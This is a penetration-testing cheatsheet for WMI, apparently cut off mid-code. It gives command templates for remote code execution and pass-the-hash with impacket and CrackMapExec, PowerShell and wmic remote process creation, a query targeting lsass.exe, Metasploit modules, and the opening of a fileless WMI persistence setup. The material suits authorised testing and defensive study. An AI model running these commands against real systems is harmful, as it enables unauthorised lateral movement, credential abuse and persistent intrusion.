WMI Enumeration Cheatsheet
Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)
What is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.
Detection
nmap -p 135 <ip>
nmap -p 135 -sV <ip>
nmap -p 135 --script msrpc-enum <ip>
impacket — wmiexec.py
# Interactive shell
python3 wmiexec.py <domain>/<user>:<pass>@<ip>
# Single command
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami"
python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all"
# Pass-the-Hash
python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip>
python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip>
# Without domain (local account)
python3 wmiexec.py ./<user>:<pass>@<ip>
CrackMapExec
crackmapexec wmi <ip> -u <user> -p <pass>
crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami'
crackmapexec wmi <ip> -u <user> -H <nthash>
crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass>
PowerShell WMI (Local & Remote)
# Local system queries
Get-WmiObject -Class Win32_OperatingSystem
Get-WmiObject -Class Win32_ComputerSystem
Get-WmiObject -Class Win32_Process
Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_Group
Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null
Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" }
Get-WmiObject -Class Win32_Product # Installed software (slow)
Get-WmiObject -Class Win32_LogicalDisk
Get-WmiObject -Class Win32_StartupCommand # Startup items
# Modern equivalent (CIM)
Get-CimInstance -ClassName Win32_OperatingSystem
Get-CimInstance -ClassName Win32_Process
# Remote queries
$cred = Get-Credential
Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred
Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred
PowerShell WMI Remote Code Execution
# Execute command via WMI (leaves process behind)
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create `
-ArgumentList "cmd.exe /c whoami > C:\output.txt" `
-ComputerName <ip> -Credential $cred
# Check output
Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\output.txt'" `
-ComputerName <ip> -Credential $cred
wmic (Legacy CLI — Windows)
:: Local
wmic os get Caption,Version,BuildNumber
wmic process list brief
wmic useraccount list brief
wmic group list brief
wmic service where "State='Running'" list brief
wmic product get Name,Version :: Installed software
wmic startupinfo list full
:: Remote
wmic /node:<ip> /user:<user> /password:<pass> os get Caption
wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt"
wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief
WQL Queries
# WQL = WMI Query Language (SQL-like)
Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'"
Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'"
Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True"
Metasploit
use exploit/windows/smb/psexec # Uses WMI/DCOM under the hood
use exploit/windows/local/wmi # Post-exploitation WMI persistence
use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM
WMI Persistence (Post-Exploitation)
# Create permanent WMI event subscription (fileless persistence)
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
Name = "PentestFilter"
EventNameSpace = "root